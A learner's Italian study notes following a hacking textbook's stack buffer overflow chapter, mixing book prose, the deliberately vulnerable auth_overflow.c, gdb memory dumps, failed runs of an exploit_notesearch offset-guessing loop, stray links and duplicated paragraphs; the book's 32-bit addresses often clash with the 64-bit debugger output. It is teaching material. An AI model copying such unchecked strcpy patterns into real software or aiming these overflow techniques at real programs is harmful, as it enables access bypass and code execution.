[lele@lele-hpelitedragonflyg2notebookpc ~]$ ls -l a.out
-rwxr-xr-x 1 lele lele 16488 9 mar 18.07 a.out
[lele@lele-hpelitedragonflyg2notebookpc ~]$ gdb -q ./a.out
Reading symbols from ./a.out…
(gdb)
………………………..
*************************************************************************************************************************************
pag. 149
Mentre è possibile accedere alla memoria di una struttura in questo
modo, si possono soltanto fare ipotesi sul tipo delle variabili presenti
nella struttura e sull’assenza di qualsiasi tipo di riempimento tra le
variabili. Poiché anche i tipi di dati degli elementi di una variabile
vengono registrati nella struttura, utilizzare i metodi adatti per accedere
agli elementi di una struttura diventa molto più semplice.
0x285 Puntatori a funzione
http://www.pluto.it/files/ildp/guide/abs/system.html
Il programma funcptr_example.c illustra l’uso dei
puntatori a funzione.
Questo puntatore viene fatto puntare
alla funzione func_one() e quindi viene richiamato; poi viene impostato
di nuovo e usato per richiamare func_two(). L’output riportato di
seguito mostra il risultato della compilazione e dell’esecuzione di questo
codice sorgente.
lele@fedora:~/Scaricati/booksrc$ gcc funcptr_example.c
lele@fedora:~/Scaricati/booksrc$ ./a.out
function_ptr is 0x00401136
This is function one
value returned was 1
function_ptr is 0x0040114b
This is function two
value returned was 2
http://www.diag.uniroma1.it/~liberato/struct/mempunt/passaggio.shtml
https://www.ibm.com/docs/it/i/7.5?topic=functions-pointers
__________________________________________________________________________________________________________________
https://en.wikipedia.org/wiki/Ping_of_death
__________________________________________________________________________________________________________________
pag. 177
0x321 Vulnerabilità a buffer overflow basate
sullo stack
L’exploit del programma notesearch opera corrompendo la memoria
per ottenere il controllo del flusso di esecuzione. Il programma auth_
overflow.c illustra ulteriormente questo concetto.
auth_overflow.c
#include
#include
#include
int check_authentication(char *password) {
int auth_flag = 0;
char password_buffer[16];
strcpy(password_buffer, password);
if(strcmp(password_buffer, "brillig") == 0)
auth_flag = 1;
if(strcmp(password_buffer, "outgrabe") == 0)
auth_flag = 1;
return auth_flag;
}
int main(int argc, char *argv[]) {
if(argc < 2) {
printf("Usage: %s \n", argv[0]);
exit(0);
}
if(check_authentication(argv[1])) {
printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
printf(" Access Granted.\n");
printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
} else {
printf("\nAccess Denied.\n");
}
}
Questo programma d’esempio accetta una password come unico
argomento della riga di comando, quindi richiama la funzione
check_authentication(). Questa richiede due password, le quali
dovrebbero essere rappresentative di diversi metodi di autenticazione. Se
viene usata una di queste due passowrd, la funzione ritorna il valore 1,
che garantisce l’accesso. Dovreste essere in grado di capire il
funzionamento del programma osservandone il codice sorgente, prima di
compilarlo. Usate l’opzione -g durante la compilazione, perché in seguito
dovremo effettuarne il debugging.
lele@fedora:~/Scaricati/booksrc$ gcc -g -o auth_overflow auth_overflow.c
lele@fedora:~/Scaricati/booksrc$ ./auth_overflow
Usage: ./auth_overflow
lele@fedora:~/Scaricati/booksrc$ ./auth_overflow test
Access Denied.
lele@fedora:~/Scaricati/booksrc$ ./auth_overflow brillig
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Finora tutto funziona come come previsto dal codice. È quel che ci si
attende da un sistema deterministico come un programma per computer.
Ma un overflow può produrre comportamenti inattesi e persino
contraddittori, per esempio concedendo l’accesso senza la giusta
password.
lele@fedora:~/Scaricati/booksrc$ ./auth_overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Errore di segmentazione (core dump creato)
pag. 178
Probabilmente avete già capito che cos’è successo, ma utilizziamo il
debugger e analizziamo la cosa nello specifico.
lele@fedora:~/Scaricati/booksrc$ gdb -q ./auth_overflow
Reading symbols from ./auth_overflow…
(gdb) list
6 int auth_flag = 0;
7 char password_buffer[16];
8
9 strcpy(password_buffer, password);
10
11 if(strcmp(password_buffer, "brillig") == 0)
12 auth_flag = 1;
13 if(strcmp(password_buffer, "outgrabe") == 0)
14 auth_flag = 1;
15
(gdb) break 9
Breakpoint 1 at 0x401179: file auth_overflow.c, line 9.
(gdb) break 16
Breakpoint 2 at 0x4011c4: file auth_overflow.c, line 16.
(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /home/lele/Scaricati/booksrc/auth_overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
This GDB supports auto-downloading debuginfo from the following URLs:
Enable debuginfod for this session? (y or [n]) y
Debuginfod has been enabled.
To make this setting permanent, add 'set debuginfod enabled on' to .gdbinit.
Downloading separate debug info for system-supplied DSO at 0x7ffff7fc4000
Downloading 6.67 M separate debug info for /lib64/libc.so.6
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
Breakpoint 1, check_authentication (
password=0x7fffffffe174 'A' ) at auth_overflow.c:9
9 strcpy(password_buffer, password);
(gdb) x/s password_buffer
0x7fffffffdc90: ""
(gdb) x/x &auth_flag
0x7fffffffdcac: 0x00
(gdb) print 0x7fffffffdcac – 0x7fffffffa0
$1 = 140187732532492
(gdb) x/16xw password_buffer
0x7fffffffdc90: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffdca0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffdcb0: 0xffffdcd0 0x00007fff 0x00401214 0x00000000
0x7fffffffdcc0: 0xffffddf8 0x00007fff 0xffffddf8 0x00000002
pag. 179
Il primo breakpoint è appena prima dell’istruzione strcpy().
Esaminando il puntatore password_ buffer, il debugger mostra che
contiene dati casuali non inizializzati ed è posto all’indirizzo di memoria
0xbffff7a0. Esaminando l’indirizzo della variabile auth_flag, possiamo
vederne sia la posizione (in memoria all’indirizzo 0xbffff7bc) che il
contenuto, pari a 0. Il comando print può servire a fare dei calcoli e
mostra che auth_flag è 28 byte dopo l’inizio di password_ buffer. Questa
relazione può essere vista come un unico blocco di memoria che parte da
password_buffer. La posizione di auth_flag è mostrata in grassetto.
Trying to Figure out how to fix this error: A breakpoint instruction (__debugbreak() statement or a similar call) was executed
byu/SFAvenged7x incpp_questions
https://algogroup.unimore.it/people/marko/courses/programmazione_II/programmazioneII-1213/12-Debugging.pdf
https://web.dev/articles/webassembly-memory-debugging?hl=it
https://www.salvorosta.it/low/shared/index.html
https://wiki.studentiunimi.it/informatica_triennale:sicurezza_e_privatezza
(gdb) continue
Continuing.
Breakpoint 2, check_authentication (
password=0x7fffffffe174 'A' ) at auth_overflow.c:16
16 return auth_flag;
(gdb) x/s password_buffer
0x7fffffffdc90: 'A'
(gdb) x/x &auth_flag
0x7fffffffdcac: 0x41
(gdb) x/16xw password_buffer
0x7fffffffdc90: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffdca0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffdcb0: 0xffff0041 0x00007fff 0x00401214 0x00000000
0x7fffffffdcc0: 0xffffddf8 0x00007fff 0xffffddf8 0x00000002
(gdb) x/4cb &auth_flag
0x7fffffffdcac: 65 'A' 65 'A' 65 'A' 65 'A'
(gdb) x/dw &auth_flagh
No symbol "auth_flagh" in current context.
(gdb) x/dw &auth_flag
0x7fffffffdcac: 1094795585
pag. 180
Continuando l’esecuzione ci si trova al successivo breakpoint, dopo
strcpy(). Possiamo esaminare nuovamente la memoria. Il password_
buffer è straripato in auth_flag, cambiandone i primi due byte in 0x41.
Il valore 0x00004141 sembra essere scritto al contrario, ma ricordando
che l’architettura x86 è di tipo little-endian, ecco che i primi due byte
sono quelli a destra e non quelli a sinistra. Se esaminiamo ciascuno di
questi quattro byte individualmente, vediamo che il programma tratterà
quest’area come un intero, con il valore 16705
http://www.di-srv.unisa.it/~ads/corso-security/www/CORSO-0304/SuperbugWindows/4%20-%20Buffer%20overflow%20classico.htm
"milo-trujillo
•
Nei computer più vecchi con indirizzamento assoluto e senza memoria virtuale, i computer hanno esattamente il problema che stai descrivendo. Se due programmi fanno riferimento allo stesso indirizzo di memoria hardcoded, allora hanno un conflitto e possono sovrascriversi a vicenda. È così che funzionavano i vecchi sistemi a singolo processo come l'Apple II o il Commodore 64, ma poiché in questi ambienti è possibile eseguire un solo programma alla volta, non ci sono conflitti.
I programmi più recenti (anni '80, anni '90) sono scritti con codice rilocabile."
What happens when more than one program is designated to use a certain memory address?
byu/wondering-soul incomputerscience
*****
esempi come nel libro
Capire il Buffer Overflow: Un’Indagine Sulla Sicurezza Informatica
(gdb) continue
Continuing.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Program received signal SIGSEGV, Segmentation fault.
0x0000000000000000 in ?? ()
pag 180 181
Dopo l’overflow, la funzione check_authentication() restituirà il
valore 16705 invece di 0. Dato che l’istruzione if considera qualunque
valore diverso da zero come un’autenticazione riuscita, il flusso di
esecuzione del programma salterà alla zona autenticata. In questo
esempio, la variabile auth_flag è il punto di controllo dell’esecuzione;
sovrascrivere quel valore consente di acquisire il controllo sul
programma.
Questo però è un esempio molto particolare che dipende fortemente
dalla posizione fisica delle variabili in memoria. Nel programma
auth_overflow2.c, le variabili vengono dichiarate nell’ordine opposto (le
modifiche rispetto ad auth_overflow.c sono evidenziate in grassetto).
auth_overflow2.c
Inoltre il codice sorgente riportato nel libro è scaricabile gratuitamente
all’indirizzo booksrc , link interno:
https://nostarch.com/hackingCD
pag 180 181
Dopo l’overflow, la funzione check_authentication() restituirà il
valore 16705 invece di 0. Dato che l’istruzione if considera qualunque
valore diverso da zero come un’autenticazione riuscita, il flusso di
esecuzione del programma salterà alla zona autenticata. In questo
esempio, la variabile auth_flag è il punto di controllo dell’esecuzione;
sovrascrivere quel valore consente di acquisire il controllo sul
programma.
Questo però è un esempio molto particolare che dipende fortemente
dalla posizione fisica delle variabili in memoria. Nel programma
auth_overflow2.c, le variabili vengono dichiarate nell’ordine opposto (le
modifiche rispetto ad auth_overflow.c sono evidenziate in grassetto).
auth_overflow2.c
https://gist.github.com/myf/3902910
*****
https://nostarch.com/download/hacking2_sample.pdf
pag. 181
Questa semplice modifica pone in memoria la variabile auth_flag
prima di password_ buffer. Ciò di fatto annulla lo stato di punto di
controllo dell’esecuzione per la variabile return_value, dato che il suo
contenuto non può più essere corrotto da alcun overflow.
https://it.wikipedia.org/wiki/Buffer_overflow
https://it.wikipedia.org/wiki/Problema_della_terminazione
https://www.ibm.com/docs/it/db2/12.1?topic=allocation-guidelines-tuning-parameters-that-affect-memory-usage
lele@fedora:~/Scaricati/booksrc$ gcc -g auth_overflow2.c
lele@fedora:~/Scaricati/booksrc$ gdb -q ./a.out
Reading symbols from ./a.out…
(gdb) list 1
1 #include
2 #include
3 #include
4
5 int check_authentication(char *password) {
6 char password_buffer[16];
7 int auth_flag = 0;
8
9 strcpy(password_buffer, password);
10
(gdb) break 9
Breakpoint 1 at 0x401179: file auth_overflow2.c, line 9.
(gdb) break 16
Breakpoint 2 at 0x4011c4: file auth_overflow2.c, line 16.
(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /home/lele/Scaricati/booksrc/a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
This GDB supports auto-downloading debuginfo from the following URLs:
Enable debuginfod for this session? (y or [n]) y
Debuginfod has been enabled.
To make this setting permanent, add 'set debuginfod enabled on' to .gdbinit.
Downloading separate debug info for system-supplied DSO at 0x7ffff7fc4000
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
Breakpoint 1, check_authentication (
password=0x7fffffffe17c 'A' ) at auth_overflow2.c:9
9 strcpy(password_buffer, password);
(gdb) x/s password_buffer
0x7fffffffdca0: ""
(gdb) x/x &auth_flag
0x7fffffffdcbc: 0x00
(gdb) x/xw &auth_flag
0x7fffffffdcbc: 0x00000000
(gdb)
pag 182
Impostiamo dei breakpoint simili a quelli del programma precedente.
Un esame della memoria ora mostra che auth_flag (in grassetto) è
allocata in memoria prima di password_buffer. Questo significa che
auth_flag non potrà mai essere sovrascritta da un overflow di
password_buffer.
(gdb) cont
Continuing.
Breakpoint 2, check_authentication (
password=0x7fffffffe17c 'A' ) at auth_overflow2.c:16
16 return auth_flag;
(gdb) x/s password_buffer
0x7fffffffdca0: 'A'
(gdb) x/x &auth_flag
0x7fffffffdcbc: 0x41
(gdb) x/16xw &auth_flag
0x7fffffffdcbc: 0x41414141 0xffff0041 0x00007fff 0x00401214
0x7fffffffdccc: 0x00000000 0xffffde08 0x00007fff 0xffffde08
0x7fffffffdcdc: 0x00000002 0xffffdd80 0x00007fff 0xf7db6248
0x7fffffffdcec: 0x00007fff 0xffffdd30 0x00007fff 0xffffde08
(gdb)
pag. 183
Come ci aspettavamo, l’overflow non disturba affatto la variabile
auth_ flag, dato che si trova prima del buffer. Tuttavia esiste un altro
punto di controllo dell’esecuzione, anche se non si vede nel codice C. È
nascosto dopo tutte le variabili di stack e può essere facilmente
sovrascritto. Lo stack è un’area di memoria a disposizione di tutti i
programmi, e quando viene sovrascritto provoca inesorabilmente il crash
del programma.
(gdb) c
Continuing.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Program received signal SIGSEGV, Segmentation fault.
0x0000000000000000 in ?? ()
(gdb)
****************************************************************************************
Inoltre il codice sorgente riportato nel libro è scaricabile gratuitamente
all’indirizzo booksrc , link interno:
https://nostarch.com/hackingCD
(gdb) c
Continuing.
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
(gdb)
Dal capitolo precedente ricordiamo che lo stack è uno dei cinque
segmenti di memoria utilizzati dai programmi. È una struttura FILO
(First-In Last-Out) utilizzata per mantenere il flusso dell’esecuzione e il
contesto delle variabili locali durante le chiamate di funzioni. Quando
viene richiamata una funzione, una struttura chiamata frame viene
inserita nello stack e il registro EIP salta alla prima istruzione della
funzione. Ogni frame dello stack contiene le variabili locali della
funzione e un indirizzo di ritorno su cui impostare l’EIP alla conclusione
della funzione. Quando la funzione termina, il frame viene fatto uscire
dallo stack e l’indirizzo di ritorno scritto sull’EIP. Il contenuto di questa
struttura viene generalmente gestito dal compilatore, non dal
programmatore. Quando viene richiamata la funzione
check_authentication(), un nuovo frame viene inserito nello stack,
sopra il frame della funzione main(). In questo frame sono presenti le
variabili locali, un indirizzo di ritorno e gli argomenti della funzione.
pag. 184
Possiamo visualizzare tutti questi elementi con il debugger:
https://it.wikipedia.org/wiki/Diagramma_di_flusso
*****
esempio fatto con visualbasic disassemble
http://wolfprojects.altervista.org/articles/lo-stack/
https://www.ibm.com/docs/it/storage-protect/8.1.24?topic=server-example-flow-diagrams-restore-retrieve
lele@fedora:~/Scaricati/booksrc$ gcc -g auth_overflow2.c
lele@fedora:~/Scaricati/booksrc$ gdb -q ./a.out
Reading symbols from ./a.out…
(gdb) list 1
1 #include
2 #include
3 #include
4
5 int check_authentication(char *password) {
6 char password_buffer[16];
7 int auth_flag = 0;
8
9 strcpy(password_buffer, password);
10
(gdb) break 24
Breakpoint 1 at 0x401201: file auth_overflow2.c, line 24.
(gdb) break 9
Breakpoint 2 at 0x401179: file auth_overflow2.c, line 9.
(gdb) break 16
Breakpoint 3 at 0x4011c4: file auth_overflow2.c, line 16.
(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /home/lele/Scaricati/booksrc/a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
This GDB supports auto-downloading debuginfo from the following URLs:
Enable debuginfod for this session? (y or [n]) y
Debuginfod has been enabled.
To make this setting permanent, add 'set debuginfod enabled on' to .gdbinit.
Downloading separate debug info for system-supplied DSO at 0x7ffff7fc4000
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
Breakpoint 1, main (argc=2, argv=0x7fffffffde08) at auth_overflow2.c:24
24 if(check_authentication(argv[1])) {
(gdb) i r esp
esp 0xffffdcd0 -9008
(gdb) x/32xw $esp
0xffffffffffffdcd0: Cannot access memory at address 0xffffffffffffdcd0
(gdb)
pag. 185
Inseriamo il primo breakpoint dopo la chiamata a
check_authentication(), in main(). A questo punto il registro ESP
del puntatore allo stack vale 0xbffff7e0, e viene visualizzata la cima dello
stack. Questo è tutto parte del frame di main(). Continuando al
successivo breakpoint, dentro check_authentication(), si vede che
l’ESP ha un valore inferiore perché risale la memoria per far spazio al
frame di check_authentication() (in grassetto), che ora si trova sulla
cima dello stack. Dopo aver trovato gli indirizzi delle variabili auth_flag
(1) e password_buffer (2), è facile individuarle nel frame dello stack
(gdb) c
Continuing.
Breakpoint 2, check_authentication (
password=0x7fffffffe17c 'A' ) at auth_overflow2.c:9
9 strcpy(password_buffer, password);
(gdb) i r esp
esp 0xffffdc90 -9072
(gdb) x/32xw $esp
0xffffffffffffdc90: Cannot access memory at address 0xffffffffffffdc90
(gdb) p 0xffffffffffffdc90 – 0xffffdc90
$1 = 18446744069414584320
(gdb) x/s password_buffer
0x7fffffffdca0: ""
(gdb) x/x &auth_flag
0x7fffffffdcbc: 0x00
pag. 186
Arrivando al secondo breakpoint all’interno di
check_authentication(), un nuovo frame (in grassetto) viene inserito
nello stack all’atto della chiamata della funzione. Dato che lo stack
cresce verso indirizzi di memoria più bassi, il puntatore allo stack ora si
trova a 64 byte meno di prima, all’indirizzo 0xbffff7a0. La dimensione e
la struttura di un frame può variare di molto, a seconda della funzione e
delle ottimizzazioni operate dal compilatore. Per esempio, i primi 24 byte
di questo frame sono solo spaziatura inserita dal compilatore. Le variabili
locali auth_ flag e password_buffer vengono visualizzate con i rispettivi
indirizzi nel frame dello stack; la variabile auth_flag ( ) all’indirizzo
0xbffff7bc e i 16 byte del buffer per le password ( ) all’indirizzo
0xbffff7c0.
Il frame dello stack contiene ben più che variabili e riempimento. Gli
elementi di check_authentication() sono mostrati di seguito. La
memoria riservata alle variabili locali è mostrata in corsivo. Essa parte
dalla variabile auth_flag all’indirizzo 0xbffff7bc e continua fino alla fine
della variabile di 16-byte password_buffer. I pochi valori che seguono
sono riempimento messo dal compilatore, più un’entità di nome SFP
pag. 187
(Saved Frame Pointer). Se il programma viene compilato con l’opzione –
fomit-frame-pointer per ottimizzazione, il puntatore a frame non viene
inserito nel frame dello stack. All’indirizzo 3 il valore 0x080484bb è
l’indirizzo di ritorno del frame e al punto 4 l’indirizzo 0xbffffe9b7 è un
puntatore a una stringa contenente 30 “A”. Questo dev’essere
l’argomento della funzione check_authentication().
(gdb) x/32xw $esp
0xffffffffffffdc90: Cannot access memory at address 0xffffffffffffdc90
(gdb) p 0xffffffffffffdc90 – 0xffffdc90
$1 = 18446744069414584320
(gdb) x/s password_buffer
0x7fffffffdca0: ""
(gdb) x/x &auth_flag
0x7fffffffdcbc: 0x00
(gdb) x/32xw $esp
0xffffffffffffdc90: Cannot access memory at address 0xffffffffffffdc90
(gdb) x/32xb 0xffffdc90
0xffffdc90: Cannot access memory at address 0xffffdc90
(gdb) x/s 0xffffdc90
0xffffdc90:
(gdb)
L’indirizzo di ritorno può essere trovato all’interno del frame a patto di
conoscere il principio con cui viene creato un frame dello stack. Questo
processo comincia nella la funzione main() ancora prima che essa venga
chiamata
gdb) disass main
Dump of assembler code for function main:
0x00000000004011c9 : push %rbp
0x00000000004011ca : mov %rsp,%rbp
0x00000000004011cd : sub $0x10,%rsp
0x00000000004011d1 : mov %edi,-0x4(%rbp)
0x00000000004011d4 : mov %rsi,-0x10(%rbp)
0x00000000004011d8 : cmpl $0x1,-0x4(%rbp)
0x00000000004011dc : jg 0x401201
0x00000000004011de : mov -0x10(%rbp),%rax
0x00000000004011e2 : mov (%rax),%rax
0x00000000004011e5 : mov %rax,%rsi
0x00000000004011e8 : mov $0x4022f9,%edi
0x00000000004011ed : mov $0x0,%eax
0x00000000004011f2 : call 0x401050
0x00000000004011f7 : mov $0x0,%edi
0x00000000004011fc : call 0x401070
0x0000000000401201 : mov -0x10(%rbp),%rax
0x0000000000401205 : add $0x8,%rax
0x0000000000401209 : mov (%rax),%rax
0x000000000040120c : mov %rax,%rdi
0x000000000040120f : call 0x401166
0x0000000000401214 : test %eax,%eax
0x0000000000401216 : je 0x401238
–Type for more, q to quit, c to continue without paging–
pag. 188
0x000000000040120c : mov %rax,%rdi
0x000000000040120f : call 0x401166
Notate le due righe in grassetto nel codice precedente. A questo punto,
il registro EAX contiene un puntatore al primo argomento della riga di
comando. Questo è anche l’argomento della funzione
check_authentication(). Questa prima istruzione assembly scrive
l’EAX nella locazione puntata dall’ESP (la cima dello stack). Così inizia
il frame di check_authentication(): con l’argomento della funzione.
La seconda istruzione è la chiamata vera e propria, inserisce l’indirizzo
della successiva istruzione nello stack e sposta l’EIP all’inizio della
funzione check_authentication(). L’indirizzo inserito nello stack è
l’indirizzo di ritorno del frame. In questo caso, l’indirizzo dell’istruzione
successiva è 0x080484bb, che è anche l’indirizzo di ritorno
(gdb) disass check_authentication
Dump of assembler code for function check_authentication:
0x0000000000401166 : push %rbp
0x0000000000401167 : mov %rsp,%rbp
0x000000000040116a : sub $0x30,%rsp
0x000000000040116e : mov %rdi,-0x28(%rbp)
0x0000000000401172 : movl $0x0,-0x4(%rbp)
=> 0x0000000000401179 : mov -0x28(%rbp),%rdx
0x000000000040117d : lea -0x20(%rbp),%rax
0x0000000000401181 : mov %rdx,%rsi
0x0000000000401184 : mov %rax,%rdi
0x0000000000401187 : call 0x401030
0x000000000040118c : lea -0x20(%rbp),%rax
0x0000000000401190 : mov $0x4022e8,%esi
0x0000000000401195 : mov %rax,%rdi
0x0000000000401198 : call 0x401060
0x000000000040119d : test %eax,%eax
0x000000000040119f : jne 0x4011a8
0x00000000004011a1 : movl $0x1,-0x4(%rbp)
0x00000000004011a8 : lea -0x20(%rbp),%rax
0x00000000004011ac : mov $0x4022f0,%esi
0x00000000004011b1 : mov %rax,%rdi
0x00000000004011b4 : call 0x401060
0x00000000004011b9 : test %eax,%eax
–Type for more, q to quit, c to continue without paging–
pag. 189
L’esecuzione continua nella funzione check_ authentication(),
dato che l’EIP è stato modificato, e le prime istruzioni (in grassetto)
finiscono di riservare la memoria per il frame. Queste istruzioni sono
note con il nome di prologo della funzione. Le prime due istruzioni
riguardano il puntatore a frame salvato, la terza sottrae 0x38 dal registro
ESP. In questo modo vengono riservati 56 byte per le variabili locali della
funzione. L’indirizzo di ritorno e il puntatore a frame salvato sono già
stati inseriti nello stack e occupano altri 8 byte del frame di 64 byte.
Quando la funzione termina, le istruzioni leave e ret rimuovono il
frame e reimpostano il registro EIP al valore che era stato salvato in esso
( 1). Questo ha l’effetto di riportare l’esecuzione del programma a
main() appena dopo la chiamata della funzione all’indirizzo
0x080484bb. Tutto questo meccanismo si innesca ogni volta che un
programma richiama una funzione.
(gdb) x/32xw $esp
0xffffffffffffdc90: Cannot access memory at address 0xffffffffffffdc90
(gdb) x/32xw $esp
0xffffffffffffdc90: Cannot access memory at address 0xffffffffffffdc90
pqg. 190
Se si sovrascrivono alcuni dei byte dove è memorizzato l’indirizzo di
ritorno, il programma cercherà di utilizzare il nuovo valore per
ripristinare il flusso di esecuzione. Questo generalmente provoca un
crash, perché di solito l’esecuzione finisce a una locazione casuale. Ma
impostando questo valore ad arte, controllando il modo in cui viene
sovrascritto l’indirizzo, l’esecuzione può saltare a una locazione
arbitraria. Il problema è dove dirgli di andare…
0x330 Esperimenti con la shell BASH
lele@fedora:~/Scaricati/booksrc$ gcc exploit_notesearch.c
exploit_notesearch.c: In function ‘main’:
exploit_notesearch.c:22:10: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
22 | ret = (unsigned int) &i – offset; // set return address
| ^
lele@fedora:~/Scaricati/booksrc$ ./a.out 100
sh: riga 1: ./notesearch: File o directory non esistente
lele@fedora:~/Scaricati/booksrc$ gcc exploit_notesearch.c
exploit_notesearch.c: In function ‘main’:
exploit_notesearch.c:22:10: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
22 | ret = (unsigned int) &i – offset; // set return address
| ^
lele@fedora:~/Scaricati/booksrc$ ./a.out 200
sh: riga 1: ./notesearch: File o directory non esistente
lele@fedora:~/Scaricati/booksrc$ seq 1 10
1
2
3
4
5
6
7
8
9
10
lele@fedora:~/Scaricati/booksrc$ seq 1 3 10
1
4
7
10
lele@fedora:~/Scaricati/booksrc$ for i in(seq 1 3 10)
bash: errore di sintassi vicino al token non atteso “(”
lele@fedora:~/Scaricati/booksrc$ for i in $(seq 1 3 10)
> do
> echo The value is $1
> done
The value is
The value is
The value is
The value is
lele@fedora:~/Scaricati/booksrc$ for i in $(seq 0 30 300)
> do
> echo Trying offset $i
> ./a.out $i
> done
Trying offset 0
sh: riga 1: ./notesearch: File o directory non esistente
Trying offset 30
sh: riga 1: ./notesearch: File o directory non esistente
Trying offset 60
sh: riga 1: ./notesearch: File o directory non esistente
Trying offset 90
sh: riga 1: ./notesearch: File o directory non esistente
Trying offset 120
sh: riga 1: ./notesearch: File o directory non esistente
Trying offset 150
sh: riga 1: ./notesearch: File o directory non esistente
Trying offset 180
sh: riga 1: ./notesearch: File o directory non esistente
Trying offset 210
sh: riga 1: ./notesearch: File o directory non esistente
Trying offset 240
sh: riga 1: ./notesearch: File o directory non esistente
Trying offset 270
sh: riga 1: ./notesearch: File o directory non esistente
Trying offset 300
sh: riga 1: ./notesearch: File o directory non esistente
lele@fedora:~/Scaricati/booksrc$ export MYVAR=test
lele@fedora:~/Scaricati/booksrc$ echo $MYVAR
test
lele@fedora:~/Scaricati/booksrc$ env
SHELL=/bin/bash
SESSION_MANAGER=local/unix:@/tmp/.ICE-unix/2344,unix/unix:/tmp/.ICE-unix/2344
COLORTERM=truecolor
HISTCONTROL=ignoredups
XDG_MENU_PREFIX=gnome-
HISTSIZE=1000
HOSTNAME=fedora
MYVAR=test
SSH_AUTH_SOCK=/run/user/1000/keyring/ssh
MEMORY_PRESSURE_WRITE=c29tZSAyMDAwMDAgMjAwMDAwMAA=
XMODIFIERS=@im=ibus
DESKTOP_SESSION=gnome
GPG_TTY=/dev/pts/1
EDITOR=/usr/bin/nano
PWD=/home/lele/Scaricati/booksrc
LOGNAME=lele
XDG_SESSION_DESKTOP=gnome
XDG_SESSION_TYPE=wayland
SYSTEMD_EXEC_PID=2402
XAUTHORITY=/run/user/1000/.mutter-Xwaylandauth.ZW4WX2
GDM_LANG=it_IT.UTF-8
HOME=/home/lele
USERNAME=lele
LANG=it_IT.UTF-8
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=01;37;41:su=37;41:sg=30;43:ca=00:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.7z=01;31:*.ace=01;31:*.alz=01;31:*.apk=01;31:*.arc=01;31:*.arj=01;31:*.bz=01;31:*.bz2=01;31:*.cab=01;31:*.cpio=01;31:*.crate=01;31:*.deb=01;31:*.drpm=01;31:*.dwm=01;31:*.dz=01;31:*.ear=01;31:*.egg=01;31:*.esd=01;31:*.gz=01;31:*.jar=01;31:*.lha=01;31:*.lrz=01;31:*.lz=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.lzo=01;31:*.pyz=01;31:*.rar=01;31:*.rpm=01;31:*.rz=01;31:*.sar=01;31:*.swm=01;31:*.t7z=01;31:*.tar=01;31:*.taz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tgz=01;31:*.tlz=01;31:*.txz=01;31:*.tz=01;31:*.tzo=01;31:*.tzst=01;31:*.udeb=01;31:*.war=01;31:*.whl=01;31:*.wim=01;31:*.xz=01;31:*.z=01;31:*.zip=01;31:*.zoo=01;31:*.zst=01;31:*.avif=01;35:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=01;36:*.au=01;36:*.flac=01;36:*.m4a=01;36:*.mid=01;36:*.midi=01;36:*.mka=01;36:*.mp3=01;36:*.mpc=01;36:*.ogg=01;36:*.ra=01;36:*.wav=01;36:*.oga=01;36:*.opus=01;36:*.spx=01;36:*.xspf=01;36:*~=00;90:*#=00;90:*.bak=00;90:*.crdownload=00;90:*.dpkg-dist=00;90:*.dpkg-new=00;90:*.dpkg-old=00;90:*.dpkg-tmp=00;90:*.old=00;90:*.orig=00;90:*.part=00;90:*.rej=00;90:*.rpmnew=00;90:*.rpmorig=00;90:*.rpmsave=00;90:*.swp=00;90:*.tmp=00;90:*.ucf-dist=00;90:*.ucf-new=00;90:*.ucf-old=00;90:
XDG_CURRENT_DESKTOP=GNOME
MEMORY_PRESSURE_WATCH=/sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service/session.slice/org.gnome.Shell@wayland.service/memory.pressure
VTE_VERSION=7800
WAYLAND_DISPLAY=wayland-0
